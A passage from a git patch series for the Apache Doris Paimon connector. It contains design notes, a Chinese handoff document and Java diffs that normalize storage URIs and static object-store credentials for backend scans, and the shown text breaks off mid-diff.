mirrors the existing `vendStorageCredentials` guard at `:363` for the offline unit-test path). + +JNI path (`buildJniScanRange`) and `getScanNodeProperties` are **not** touched (JNI carries its own FileIO; credential keys are a separate fix #2). + +## Implementation Plan +1. `ConnectorContext.java`: add `normalizeStorageUri` default method. +2. `DefaultConnectorContext.java`: add `storagePropertiesSupplier` field + 4-arg ctor (existing ctors delegate with empty-map supplier) + `normalizeStorageUri` override + `LocationPath` import. +3. `PluginDrivenExternalCatalog.java:150`: pass the storage-props supplier. +4. `PaimonScanPlanProvider.java`: add `normalizeUri` helper; apply at `:270` and `:282`. +5. Tests (below). Build `:fe-core -am` (SPI+fe-core) then `:fe-connector-paimon -am`. +6. `tools/check-connector-imports.sh` must stay clean (no new fe-core import in connector). + +## Risk Analysis +- **Regression on s3:// / hdfs:// (common path)**: `normalizeStorageUri` now runs on every native path. For an `s3://`/`hdfs://` warehouse, `getStoragePropertiesMap()` contains the matching type → `validateAndNormalizeUri` is a no-op/idempotent → same `s3://`/`hdfs://` reaches BE. Legacy uses the identical 2-arg `of()`, so parity holds. Verified: the catalog's storage type == the warehouse scheme, so the map always has the entry for a working catalog. +- **Fail-loud**: matches legacy (2-arg `of()` throws `StoragePropertiesException` on missing props). A wrong/un-normalizable path → loud failure instead of silent BE corruption (Rule 12). +- **Vended-vs-static map (scope note)**: legacy overlays vended creds via `VendedCredentialsFactory.getStoragePropertiesMapWithVendedCredentials`; this fix uses the **static** `getStoragePropertiesMap()`. For **scheme** normalization the vended overlay is irrelevant (vended creds change `AWS_*` keys, not the scheme/bucket form) **as long as the warehouse endpoint is statically configured** (the overwhelmingly common case for OSS/COS/OBS — you need the endpoint to connect). The only divergence is a *pure-vended, no-static-storage-config* REST catalog, where `getStoragePropertiesMap()` may lack the entry and normalization throws. That edge overlaps the credential seam fixes (#2 `FIX-STATIC-CREDS-BE` / `FIX-REST-VENDED`) and is **explicitly out of scope** here; tracked in `deviations-log.md`. +- **Other connectors**: SPI method has an identity default; only paimon calls it. Zero impact on es/jdbc/maxcompute/trino. + +## Test Plan + +### Unit Tests +1. **`DefaultConnectorContextNormalizeUriTest` (fe-core)** — construct `DefaultConnectorContext` with a real OSS `StorageProperties` map (built from `oss.endpoint`/`oss.access_key`/… via `StorageProperties.createAll`), assert `normalizeStorageUri("oss://bkt/warehouse/f.parquet")` → `s3://…`. Assert identity for `s3://…` input. Assert empty-map supplier ctor + non-normalizable input behavior (fail-loud). *Encodes WHY: BE only opens canonical scheme; mutation = returning raw oss:// → red.* +2. **`PaimonScanPlanProviderTest` (connector) — wiring** — extend `RecordingConnectorContext` with a `normalizeStorageUri` override that records the call and applies a deterministic `oss://`→`s3://` rewrite. Build a native `DataSplit` (RawFile + DeletionFile with `oss://` paths) through `planScan`; assert the resulting `PaimonScanRange` carries **both** the normalized data-file path (via `getPath()`) **and** the normalized DV path (via `getProperties().get("paimon.deletion_file.path")`). Assert the offline no-context path still emits raw (preserves existing offline behavior). *Encodes WHY: both raw sites must route through the hook; mutation = dropping either call site → red on that path.* + +### E2E Tests (CI-gated — note, do not claim run) +- `test_paimon_*` deletion-vector + native-read suites over an **OSS** warehouse (DELETE then SELECT; assert deleted rows stay deleted and native ORC/Parquet rows return). Requires live OSS creds → CI-gated. + +## SPI / logs +- New SPI method `ConnectorContext.normalizeStorageUri` → register in `plan-doc/01-spi-extensions-rfc.md`. +- Vended-vs-static map scope decision → `plan-doc/deviations-log.md`. +- No user-sign-off decision (approach pre-blessed by task-list fix-sketch: "add a ConnectorContext path-normalization SPI hook (mirror the FIX-REST-VENDED seam)"). + +## Result (2026-06-11 — implemented + verified) +- **Implemented exactly as designed**: SPI `ConnectorContext.normalizeStorageUri` (identity default); `DefaultConnectorContext` override via 2-arg `LocationPath.of` + a lazy `storagePropertiesSupplier` (new 4-arg ctor, existing ctors delegate empty-map); `PluginDrivenExternalCatalog` wires `() -> catalogProperty.getStoragePropertiesMap()`; connector routes BOTH data-file + DV paths through `normalizeUri` (extracted package-private `buildNativeRange`). +- **Build + UT (green)**: `mvn test -pl :fe-connector-paimon -am` → BUILD SUCCESS, module 216/0/0 (1 CI-gated skip); `PaimonScanPlanProviderTest` 15→18 (+3 new wiring tests). `mvn test -pl :fe-core -am -Dtest=DefaultConnectorContext*` → BUILD SUCCESS, `DefaultConnectorContextNormalizeUriTest` 4/0/0, `DefaultConnectorContextVendTest` 2/0/0 (ctor change non-breaking). Checkstyle 0 violations (all modules). `tools/check-connector-imports.sh` clean. +- **Tests added**: fe-core `DefaultConnectorContextNormalizeUriTest` (oss→s3, s3 idempotent, null/blank, empty-map fail-loud); connector `PaimonScanPlanProviderTest` (both-paths normalized + call count, DV-less, no-context raw). +- **Not run (CI-gated)**: live OSS-warehouse + DV e2e — noted as gated, not executed. +- Logged: SPI RFC §21 (E13), deviations-log DV-025 (static-vs-vended map scope). From 604bad6792553a4b1c954d7e1456947dfe7db001 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 11 Jun 2026 13:07:27 +0800 Subject: [PATCH 016/128] docs: checkpoint rereview2 #1 done; hand off #2 FIX-STATIC-CREDS-BE Mark FIX-URI-NORMALIZE complete (commit 20b19d19dd8) in the task list and update HANDOFF: #1 summary + verification, next session starts at #2 (reuse the normalizeStorageUri BE-scan-prop normalization seam), and the standing reminders (regression-conf.groovy still holds a plaintext key -> path-whitelist only; P2 #8/#9 need user scope decision first). Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 92 ++++++++++++------------ plan-doc/task-list-P5-rereview2-fixes.md | 2 +- 2 files changed, 48 insertions(+), 46 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 36a0c1ed2e267f..2ecee9e3ad38f6 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,60 +5,62 @@ --- -# ✅ 已完成(本 session,2026-06-11)— P5 paimon fullpath-review 修复执行(全 8 fix IMPL) - -**用户选定 scope = "BLOCKERs + key MAJORs" = 8 fix。本 session 完成全部 8 个 fix 的 IMPL + UT + 文档。** -进度表:[`plan-doc/task-list-P5-paimon-fixes.md`](./task-list-P5-paimon-fixes.md)(8/8 全勾)。每 fix 的 IMPL SUMMARY 写回 `plan-doc/tasks/designs/P5-fix--design.md` 尾部。 - -## 8 fix 全绿(build+连接器 UT,maven 绝对 -f,读 surefire XML) -| # | id | sev | 改动 | UT | -|---|----|-----|------|-----| -| 1 | FIX-STORAGE-CREDS | BLOCKER×2 | `applyStorageConfig` 加 canonical s3.*/oss.*/AWS_* → fs.s3a./fs.oss.(+DLF region 派生 OSS endpoint) | PaimonCatalogFactoryTest 38/0 | -| 2 | FIX-NATIVE-PARTVAL | BLOCKER+MAJOR | `serializePartitionValue` 全类型 port + session-TZ(仅 LTZ 用) | PaimonPartitionValueRenderTest 7/0 | -| 3 | FIX-TZ-ALIAS | MAJOR | 完整 legacy 别名图(`ZoneId.SHORT_IDS`+4 override,TreeMap CI) | PaimonConnectorMetadataMvccTest 37/0 | -| 4 | FIX-TABLE-STATS | MAJOR | `getTableStatistics` override + `PaimonCatalogOps.rowCount` seam | PaimonConnectorMetadataStatisticsTest 4/0 | -| 5 | FIX-CPP-READER | BLOCKER | `enable_paimon_cpp_reader` → `encodeSplit` 原生 DataSplit.serialize | PaimonScanPlanProviderTest(含真 DataSplit 往返) | -| 6 | FIX-READ-NOTNULL | MAJOR | `mapFields` 一行 `nullable=true`(legacy parity restore) | PaimonConnectorMetadataTest 12/0 | -| 7 | FIX-HMS-CONFRES | MAJOR | **扩 SPI** `loadHiveConfResources` + `buildHmsHiveConf(props,fileMap)` base 合并 | conn 42/0 + PaimonHmsConfResWiringTest | -| 8 | FIX-REST-VENDED | BLOCKER | **扩 SPI** `vendStorageCredentials` + scan-props `location.*` overlay | conn 15/0 + fe-core DefaultConnectorContextVendTest 2/0 | - -- **最终整模块 checkpoint**:`fe-connector-paimon` 19 测试类 / **213 tests / 0 fail / 0 err / 1 skip**(skip=live-gated `PaimonLiveConnectivityTest`)。 -- **fe-core 编译干净** + fe-core 新测 `DefaultConnectorContextVendTest` 2/0(验真 `StorageProperties` 归一化产出 AWS_*)。 -- 连接器禁 import fe-core:`bash tools/check-connector-imports.sh` 全程 clean。 - -## ⚠️ 实现中查出的设计订正(已落各 design 尾 + 已修,复审锚点) -- **FIX-STORAGE-CREDS**:设计的 anon-bucket 测断言 `assertNull(fs.s3a.aws.credentials.provider)` 错——Hadoop `Configuration` 有 baked-in 默认 provider 链;改 `assertNotEquals(Simple-single,…)`(产线正确,仅测断言订正)。 -- **FIX-NATIVE-PARTVAL**:`ISO_LOCAL_DATE_TIME` 在秒+纳秒皆 0 时**省略秒**(`08:00:00`→`"…T08:00"`,legacy 同行为);测用非零秒 wall clock(`01:02:03`)避歧义。 -- **FIX-TZ-ALIAS**:把 `resolveTimestampDigitalUnaffectedByUnsupportedZoneAlias` 的 `"CST"`→`"XYZ"`(CST 修后会解析,留 CST 则测失去捕变力)——设计说"keep as-is",此为 Rule 9 必要订正。 -- **FIX-HMS-CONFRES**:设计 test2 用 `hive.metastore.uris`,被 `HMS_URI` 别名二次解析干扰;改用非 uri 键 `hive.metastore.sasl.qop` 隔离 file-base-vs-user 优先级(产线正确)。 -- **FIX-REST-VENDED**:设计"Construction change"(线程 `Supplier` 入 ctor + 改 `PluginDrivenExternalCatalog`/`CatalogFactory`)**实际不需要**——impl 仅用 `rawVendedCredentials` 入参,故 0 ctor 改、0 `PluginDrivenExternalCatalog` 改(blast-radius 更小)。 +# 🎯 下一个 session 的任务 — **逐一修复 paimon connector 第二轮 review 的问题(#1 已完成 → 从 #2 起)** ---- +第二轮 clean-room 对抗 review 已完成(report:[`plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md`](./reviews/P5-paimon-rereview2-2026-06-11.md),含 §9 与第一轮的交叉核对)。结论:**NOT commit-ready** —— 4 个 confirmed BLOCKER 族 + 6 个 confirmed MAJOR。问题**按优先级排成任务列表**: + +👉 **任务清单(按优先级):[`plan-doc/task-list-P5-rereview2-fixes.md`](./task-list-P5-rereview2-fixes.md)** —— 逐条含 finding 引用、连接器 `file:line`、legacy parity 锚、fix sketch、SPI 影响、测法。 + +## ✅ 本 session 已完成:#1 `FIX-URI-NORMALIZE`(BLOCKER B-7DF+B-7DV)—— commit `20b19d19dd8` +- native 数据文件路径 + DV 路径裸传 BE(oss/cos/obs/s3a 未归一化 s3://)→ S3-兼容 warehouse native 读挂 / DV 静默丢错行。**两路径机制不同**:数据文件经 `PluginDrivenSplit` 单-arg `LocationPath.of`→`FileQueryScanNode:568`;DV 由连接器 `populateRangeParams` 烤进 thrift(fe-core 不经手)→ bridge-only 修不到 DV。 +- **修法**:新 SPI `ConnectorContext.normalizeStorageUri`(恒等 default,仿 `vendStorageCredentials`);`DefaultConnectorContext` 经引擎 2-arg `LocationPath.of` + catalog 静态 storage map(新 lazy supplier + 4-arg ctor,`PluginDrivenExternalCatalog` 接线);连接器在抽出的可测 `buildNativeRange` 对**数据文件 + DV 双路**调 `normalizeUri`。fail-loud。 +- **验证**:paimon 216/0/0(+3 wiring 测)、fe-core 目标测绿(normalize 4/0/0 + vend 2/0/0 未坏)、checkstyle 0、import-gate 净。live OSS+DV e2e CI-gated(未跑)。设计 [`P5-fix-URI-NORMALIZE-design.md`](./tasks/designs/P5-fix-URI-NORMALIZE-design.md)、SPI RFC §21、[DV-025](./deviations-log.md)(静态-vs-vended map scope)。 + +## 🔜 下一个 session:从 **#2 `FIX-STATIC-CREDS-BE`** 起,按 task-list 顺序续修 +> ⚠️ 见下「给下一个 agent 的 meta」:#1 已建好「BE-bound scan-prop 经 `ConnectorContext` 归一化」缝(`normalizeStorageUri`),#2(静态 s3/oss/cos/obs 凭据→BE `AWS_*`)可复用同模式(在 `DefaultConnectorContext` 加凭据归一化或扩 `vendStorageCredentials` tail)。#2 与 #1 共「BE scan-prop 归一化」主题。 +> ⚠️ P2 两条(#8 count-pushdown / #9 sub-split)严重度有争议(R1=MINOR/R2=MAJOR,均结果正确仅性能)—— **动手前先找用户定 scope**(accept-or-defer),别默认全做。 + +每条遵循项目既定 per-fix 流程(与 `step-by-step-fix` skill 一致): +1. 写设计 doc → `plan-doc/tasks/designs/P5-fix--design.md`(Problem / Root Cause / Design / Impl Plan / Risk / Test Plan)。 +2. **先拿当前代码复核 finding**(review 只读,行号可能漂移)。 +3. 实现(minimal、surgical、match style;**连接器禁 import fe-core**)。 +4. build + UT(绝对 `-f`、读 surefire XML + `MVN_EXIT`;加 fail-before/pass-after UT)。 +5. **每个 fix 独立 commit**(先看下方 Commit 须知)→ 可选 `plan-doc/reviews/P5-fix--review-rounds.md`。 +6. SPI 改动登记 `01-spi-extensions-rfc.md`;用户签字决策入 `decisions-log.md`;接受的偏差入 `deviations-log.md`;同步更新 task-list 进度表。 + +## 📋 优先级总览(详见 task-list) -# ▶️ 下一步 — 用户决策:commit + live-e2e → B8 删 legacy → B9 回归 +| 层 | 条目 | 说明 | +|---|---|---| +| **P0 BLOCKER(挡 commit)** | 1.`FIX-URI-NORMALIZE`(B-7DF/DV) · 2.`FIX-STATIC-CREDS-BE`(B-9) · 3.`FIX-SCHEMA-EVOLUTION`(B-1a+M-10) · 4.`FIX-JDBC-DRIVER-URL`(B-8a/b) | #1+#2 面最广(OSS/COS/OBS/私有 S3 上**所有** native 读直接挂)且共用「BE-bound scan-prop 归一化」缝(复用 `FIX-REST-VENDED` 的 `ConnectorContext` 模式);#3 失败模式最危险(**静默错行**)但触发更窄+SPI surface 最大、**若把静默损坏排第一可先做 #3**(独立于 #1/#2);#4 仅 JDBC flavor。 | +| **P1 MAJOR(修或显式接受)** | 5.`FIX-MAPPING-FLAG-KEYS`(M-crit) · 6.`FIX-KERBEROS-DOAS`(M-8+M-11) · 7.`FIX-FORCE-JNI-SCANNER`(M-1) | M-crit 是 critic-surfaced、**未过 3-lens**→先复核;M-8/M-11 同属 UGI `doAs` 缺失(grouped)。 | +| **P2 严重度有争议(perf;R1=MINOR)** | 8.`FIX-COUNT-PUSHDOWN`(M-2) · 9.`FIX-NATIVE-SUBSPLIT`(M-3) | 结果正确、仅性能/并行。**用户定 scope**:建议 accept-or-defer(defer 则登 `deviations-log`)。 | +| **P3 覆盖缺口(去查、非确认 bug)** | 复验 `FIX-HMS-CONFRES` 是否真生效 · DDL 写路径 parity · ANALYZE/列统计 · split-count 计账 | critic 标注本轮未追/未复验;查出真分歧才转 FIX 任务。 | +| **P4 MINOR/NIT** | 见 review §5 | 一次性 cleanup pass;唯一有真实(罕见)数据边的是 partition null-sentinel(`__HIVE_DEFAULT_PARTITION__`/`\N` 字面值被当 NULL)。 | -**全 8 fix IMPL 完,commit 仍 HELD(项目规矩:无用户 ask 不 commit)。** 等用户决定: -1. **commit 分组**:B7 翻闸(core cutover)+ 2 restore + 8 fix + 测 + docs 一并未提交在树。用户定 commit 分组(建议:B7 一组、8 fix 一组或逐 fix 一组)。 -2. **commit 前必 scrub** `regression-test/conf/regression-conf.groovy`(明文 Aliyun key),用 path-whitelist `git add fe/... plan-doc/...`,**勿 `git add -A`**;scratch 勿提交(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。[[catalog-spi-gson-migrate-all-three]] GSON atomic landmine 仍适用。 -3. **live-e2e(CI 跳,需真 infra)**:8 fix 的凭据/原生渲染/HMS-file/REST-vended 路径都列了 gated live 验证(见各 design 尾"Live-e2e"段)。 -4. 之后 → **B8 删 legacy**(`datasource/paimon/*` + 死 `property/metastore/Paimon*`)→ **B9 回归**。 +> **交叉核对要点(review §9)**:上一轮 8 个 fix 对**本轮复测到的**全部生效;但 (a) 上一轮 2 个 PARTIAL(DV/数据文件归一化、JDBC driver_url)从未修、本轮升级为 BLOCKER;(b) 凭据有**三道缝**,catalog-FileIO 与 vended 已修,**static→BE-scan 缝(B-9)漏修**;(c) native schema-evolution(B-1a)上一轮误判 MINOR、本轮经 BE 追踪确认 BLOCKER。无任何上一轮 CONFIRMED 被本轮推翻。 --- # 📦 仓库状态 +- **HEAD = `20b19d19dd8`**(`fix: FIX-URI-NORMALIZE`,本 session #1 修复;其父 `98a73bf7692` = `[P5-B7+fixes]`)。该 commit 含 #1 代码+测试+设计 doc+SPI RFC §21+DV-025+task-list 进度,并一并纳入上一 session 未 commit 的 review report + task-list。本 session 改动(**未 commit**):`plan-doc/HANDOFF.md`(本文件)、`plan-doc/task-list-P5-rereview2-fixes.md`(#1 commit-cell 标 ✅ 的后续微调);scratch 仍未 commit(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。 +- ⚠️ **`regression-test/conf/regression-conf.groovy` 仍 modified-未 commit 且含明文 Aliyun key** —— 任何 commit 前继续 path-whitelist,严禁 `git add -A`。 +- 当前分支 `catalog-spi-07-paimon`(非 `master`)→ 在此 commit 修复 OK。 +- **legacy `datasource/paimon/*` 仍在树内**(B8 删除未做)→ 每个 fix 都能 side-by-side diff 做 parity。 +- 迁移链:`512a67ee3ac`(B0)→`807308993fb`(B1)→`a2b765677d1`(B2/B3)→`ae5ad30b938`(B4)→`d2a2c8d761a`(B5/B6)→`98a73bf7692`(B7+fixes)→`20b19d19dd8`(rereview2 #1 FIX-URI-NORMALIZE, HEAD)。 -- **HEAD = `d2a2c8d761a`**。working tree **uncommitted**:B7 翻闸 + 2 restore + **8 fix** + 测 + docs + 上一轮 review 产物。 -- **本 session 改的产线文件(7)**:`PaimonCatalogFactory` / `PaimonCatalogOps` / `PaimonConnector` / `PaimonConnectorMetadata` / `PaimonScanPlanProvider`(连接器)+ `ConnectorContext`(SPI)+ `DefaultConnectorContext`(fe-core)。 -- **新测文件(4)**:`PaimonPartitionValueRenderTest` / `PaimonConnectorMetadataStatisticsTest` / `PaimonHmsConfResWiringTest`(连接器)+ `DefaultConnectorContextVendTest`(fe-core)。改测:`PaimonCatalogFactoryTest` / `PaimonScanPlanProviderTest` / `PaimonConnectorMetadataTest` / `PaimonConnectorMetadataMvccTest` / `RecordingPaimonCatalogOps` / `RecordingConnectorContext` / `FakePaimonTable`。 -- **legacy 基线** = `1872ea05310`。迁移链:`512a67ee3ac`(B0)→`807308993fb`(B1)→`a2b765677d1`(B2/B3)→`ae5ad30b938`(B4)→`d2a2c8d761a`(B5/B6);B7 + 8 fix 未 commit。 +## ⚠️ Commit 须知(任何 `git add` 前必读) +- **硬前置**:scrub `regression-test/conf/regression-conf.groovy`(明文 Aliyun key)+ 清 scratch(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。**path-whitelist `git add`,严禁 `git add -A`。** +- 每个 fix 独立 commit;message = `fix: ` + 根因 + 解法 + 测试,末尾带项目 Co-Authored-By trailer。 +- 改 fe-core/SPI 的 fix(#1/#2/#3,可能 #4/#6):commit 须含连接器 + SPI + fe-core 三侧 + 测试,按 path-whitelist 加。 ## ⚙️ 操作须知(复用) -- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`(`-am` 跨上游模块须带 `-DfailIfNoTests=false`,否则 fe-thrift 报 "No tests were executed");验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。 -- **`-pl :fe-connector-paimon -am` 不重编 fe-core**(连接器不依赖 fe-core);改 `DefaultConnectorContext`/fe-core 须单独 `-pl :fe-core -am` 编/测验证。 -- 连接器禁 import fe-core(`bash tools/check-connector-imports.sh`);单测基建技巧见 [[catalog-spi-fe-core-test-infra]]。 -- cwd 跨 Bash 调用持久,`cd` 会破相对路径 → 一律绝对路径(本 session 踩过一次)。 +- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。`-pl :fe-connector-paimon -am` **不重编 fe-core**;改 fe-core 须单独 `-pl :fe-core -am`。 +- 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(决定 task-list「SPI?」列:B1/B3/B2 因不能 import `LocationPath`/`StorageProperties` 须走 fe-core 桥或新 `ConnectorContext` SPI 缝)。 +- cwd 跨 Bash 调用持久,`cd` 破相对路径 → 一律绝对路径。 +- 测试优先 runnable FE **单测**(连接器 harness:`FakePaimonTable`/`RecordingPaimonCatalogOps`/`RecordingConnectorContext`/`PaimonScanPlanProviderTest`);live-e2e(S3/OSS/REST/JDBC/Kerberos)CI-gated → 注明 gated,勿谎称跑过。 ## 🧠 给下一个 agent 的 meta -- 8 fix 的逐条 root-cause + patch + UT + 实现订正已落各 `P5-fix--design.md`(IMPL SUMMARY 段)。复审以各 design 尾为锚。 -- review 报告 [`P5-paimon-fullpath-review-2026-06-11.md`](./reviews/P5-paimon-fullpath-review-2026-06-11.md) 的 file:line 是 review-only 基线(修复后行号已漂移)。 -- 记忆 [[catalog-spi-p5-fullpath-review-result]] 记 review 结论;本 session 的修复执行结论应新增/更新记忆(见下)。 +- 改 fe-core handle/scan 流前,先 grep 全 `metadata.getTableHandle` / scan-node 调用方(历史教训:独立 handle 面绕 seam 会静默错行)。 +- P2 两条(count-pushdown、sub-split)严重度有争议(R1 判 MINOR、R2 判 MAJOR,均「结果正确仅性能」)—— **先找用户定 scope 再动手**,别默认按 MAJOR 全做。 +- M-crit(mapping-flag)未过 3-lens 对抗验证 → 实现前先独立复核 dotted-vs-underscore key 事实成立再修。 diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index 4af015e50d6218..291e8288c21967 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -23,7 +23,7 @@ | # | ID | sev | finding | area / file(s) | SPI? | design | impl | build+UT | commit | |---|----|-----|---------|----------------|------|--------|------|----------|--------| -| 1 | FIX-URI-NORMALIZE | BLOCKER | B-7DV + B-7DF | native data-file + DV path scheme norm (oss/cos/obs/s3a→s3) | **yes** | ✅ | ✅ | ✅ | 🔄 | +| 1 | FIX-URI-NORMALIZE | BLOCKER | B-7DV + B-7DF | native data-file + DV path scheme norm (oss/cos/obs/s3a→s3) | **yes** | ✅ | ✅ | ✅ | ✅ `20b19d19dd8` | | 2 | FIX-STATIC-CREDS-BE | BLOCKER | B-9 | static s3/oss/cos/obs creds → BE as canonical `AWS_*` | **yes** | ⬜ | ⬜ | ⬜ | ⬜ | | 3 | FIX-SCHEMA-EVOLUTION | BLOCKER | B-1a (+M-10) | emit `current_schema_id`/`history_schema_info` + field-id thru SPI | **yes** | ⬜ | ⬜ | ⬜ | ⬜ | | 4 | FIX-JDBC-DRIVER-URL | BLOCKER | B-8a + B-8b | resolve+alias `jdbc.driver_url` for BE; enforce security allow-list | maybe | ⬜ | ⬜ | ⬜ | ⬜ | From f5389a8b90bd350bdcb6baf8678204d54d634ebb Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 11 Jun 2026 13:52:42 +0800 Subject: [PATCH 017/128] =?UTF-8?q?fix:=20FIX-STATIC-CREDS-BE=20=E2=80=94?= =?UTF-8?q?=20normalize=20static=20object-store=20creds=20to=20BE-canonica?= =?UTF-8?q?l=20AWS=5F*?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Finding B-9 (BLOCKER, rereview2). The paimon connector copied static catalog-level storage credentials/config verbatim into the BE scan-node properties: PaimonScanPlanProvider.getScanNodeProperties iterated the raw catalog properties and emitted location. for any s3./oss./cos./obs./ hadoop./fs./dfs./hive. prefix; the fe-core bridge only strips the location. prefix. BE's native (FILE_S3) reader understands ONLY AWS_ACCESS_KEY/ AWS_SECRET_KEY/AWS_ENDPOINT/AWS_REGION/AWS_TOKEN, so static s3.access_key/ oss.access_key on a private bucket reached BE unintelligible -> no usable credentials -> 403. This is the third credential seam (static->BE-scan), missed by both the prior round and the 8 fixes (review §9.3); the catalog- FileIO seam (FIX-STORAGE-CREDS) and the vended seam (FIX-REST-VENDED) were already closed. Root cause: legacy PaimonScanNode.getLocationProperties returns only CredentialUtils.getBackendPropertiesFromStorageMap(storagePropertiesMap) (the canonical AWS_*/hadoop/dfs map). The cutover replaced that single normalized call with a raw prefix-copy loop; the connector cannot import fe-core's StorageProperties so it had no access to the normalization. Solution (D-048, user-signed full legacy-parity scope): new no-op-default SPI ConnectorContext.getBackendStorageProperties(); DefaultConnectorContext returns getBackendPropertiesFromStorageMap over the storagePropertiesSupplier already wired in FIX-URI-NORMALIZE (no ctor change, CredentialUtils already imported). The connector replaces its raw prefix-copy loop with a context-gated overlay of that map; the vended overlay stays after it (vended wins on collision, legacy precedence). Object-store creds -> AWS_*; HDFS -> canonical hadoop/dfs (preserves user overrides + adds the legacy defaults, folding in the §211 MINOR); drops the non-parity hive.* passthrough. Investigated the AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS two-step edge and confirmed via BE s3_util.cpp (both providers prefer explicit ak/sk over cred_provider_type) that it is harmless — no regression. Connector import-gate stays clean. Tests: fe-core DefaultConnectorContextBackendStoragePropsTest (OSS static creds -> AWS_*, raw alias absent; no-supplier -> empty); connector PaimonScanPlanProviderTest (+getScanNodePropertiesNormalizesStaticCreds raw alias not shipped; modified vended-overlay collision to canonical keys; renamed no-context test -> emits no storage props). Fail-before/pass-after proven by reverting the connector change (2/3 go red). Module 217/0/0 (1 CI-gated skip), checkstyle clean, import-gate clean. Live private-bucket native-read e2e is CI-gated (not run). SPI RFC §22 (E14). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonScanPlanProvider.java | 19 +-- .../paimon/PaimonScanPlanProviderTest.java | 86 ++++++++++--- .../doris/connector/spi/ConnectorContext.java | 23 ++++ .../connector/DefaultConnectorContext.java | 11 ++ ...nnectorContextBackendStoragePropsTest.java | 84 +++++++++++++ plan-doc/01-spi-extensions-rfc.md | 20 +++ plan-doc/decisions-log.md | 1 + plan-doc/task-list-P5-rereview2-fixes.md | 2 +- .../designs/P5-fix-STATIC-CREDS-BE-design.md | 117 ++++++++++++++++++ 9 files changed, 337 insertions(+), 26 deletions(-) create mode 100644 fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextBackendStoragePropsTest.java create mode 100644 plan-doc/tasks/designs/P5-fix-STATIC-CREDS-BE-design.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index f254decf4c9534..530dc79c3aa4f9 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -369,14 +369,17 @@ public Map getScanNodeProperties( props.put("paimon.options_json", sb.toString()); } - // Location / storage properties (static catalog-level keys) - for (Map.Entry entry : properties.entrySet()) { - String key = entry.getKey(); - if (key.startsWith("hadoop.") || key.startsWith("fs.") - || key.startsWith("dfs.") || key.startsWith("hive.") - || key.startsWith("s3.") || key.startsWith("cos.") - || key.startsWith("oss.") || key.startsWith("obs.")) { - props.put("location." + key, entry.getValue()); + // FIX-STATIC-CREDS-BE (B-9): static catalog-level storage credentials/config, normalized to + // BE-canonical keys (AWS_* for object stores, hadoop/dfs for HDFS). Ports legacy + // PaimonScanNode.getLocationProperties() = getBackendPropertiesFromStorageMap(storagePropertiesMap): + // BE's native (FILE_S3) reader understands ONLY the canonical keys, so the raw catalog aliases + // (s3.access_key, oss.access_key, …) must be translated before they leave FE — copying them + // verbatim gives the native reader no usable creds (403 on a private bucket). The connector + // cannot import fe-core StorageProperties -> it delegates to the ConnectorContext seam. Empty + // when no context (offline unit tests) -> no storage props emitted (never the broken raw aliases). + if (context != null) { + for (Map.Entry e : context.getBackendStorageProperties().entrySet()) { + props.put("location." + e.getKey(), e.getValue()); } } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index b9322526a17bd7..99387a384d29dd 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -521,9 +521,11 @@ public void extractVendedTokenEmptyForNullAndNonRestFileIO() { "a non-RESTTokenFileIO table must yield no vended token"); } - /** A ConnectorContext whose vendStorageCredentials returns a fixed normalized map (the engine's - * StorageProperties normalization is exercised by the fe-core DefaultConnectorContextVendTest). */ - private static ConnectorContext vendingContext(Map fixed) { + /** A ConnectorContext whose getBackendStorageProperties / vendStorageCredentials return fixed + * normalized maps. The engine's real StorageProperties normalization is exercised by the fe-core + * DefaultConnectorContextBackendStoragePropsTest / DefaultConnectorContextVendTest; here we pin the + * connector wiring (overlay order + that the raw catalog aliases are NOT shipped). */ + private static ConnectorContext scanContext(Map backendStatic, Map vended) { return new ConnectorContext() { @Override public String getCatalogName() { @@ -535,13 +537,56 @@ public long getCatalogId() { return 0; } + @Override + public Map getBackendStorageProperties() { + return backendStatic; + } + @Override public Map vendStorageCredentials(Map raw) { - return fixed; + return vended; } }; } + @Test + public void getScanNodePropertiesNormalizesStaticCreds() { + FakePaimonTable table = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + PaimonTableHandle handle = new PaimonTableHandle( + "db1", 